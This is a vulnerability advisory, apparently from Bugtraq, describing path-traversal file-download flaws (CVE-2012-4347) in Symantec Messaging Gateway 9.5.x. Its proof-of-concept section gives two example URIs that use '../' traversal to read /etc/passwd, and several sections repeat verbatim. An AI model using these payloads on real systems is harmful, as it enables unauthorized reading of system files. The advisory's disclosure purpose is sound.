Symantec Messaging Gateway Arbitrary File Download Vulnerabilities
BID:56789
Info
Symantec Messaging Gateway Arbitrary File Download Vulnerabilities
| Bugtraq ID: | 56789 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-4347 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 01 2012 12:00AM |
| Updated: | Dec 01 2012 12:00AM |
| Credit: | Ben Williams |
| Vulnerable: |
Symantec Messaging Gateway 9.5.1 Symantec Messaging Gateway 9.5.3-3 Symantec Messaging Gateway 9.5 |
| Not Vulnerable: | |
Discussion
Symantec Messaging Gateway Arbitrary File Download Vulnerabilities
Symantec Messaging Gateway is prone to multiple arbitrary file-download vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
Symantec Messaging Gateway 9.5.x versions are vulnerable.
Symantec Messaging Gateway is prone to multiple arbitrary file-download vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
Symantec Messaging Gateway 9.5.x versions are vulnerable.
Exploit / POC
Symantec Messaging Gateway Arbitrary File Download Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1
http://www.example.com/brightmail/admin/restore/download.do?no-cache=false&displayTab=restore&restoreSource=APPLIANCE&localBackupFileSelection=../../etc/passwd
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1
http://www.example.com/brightmail/admin/restore/download.do?no-cache=false&displayTab=restore&restoreSource=APPLIANCE&localBackupFileSelection=../../etc/passwd
Solution / Fix
Symantec Messaging Gateway Arbitrary File Download Vulnerabilities
Solution:
Vendor updates are available. Please see the references for more information.
Solution:
Vendor updates are available. Please see the references for more information.
References
Symantec Messaging Gateway Arbitrary File Download Vulnerabilities
References:
References: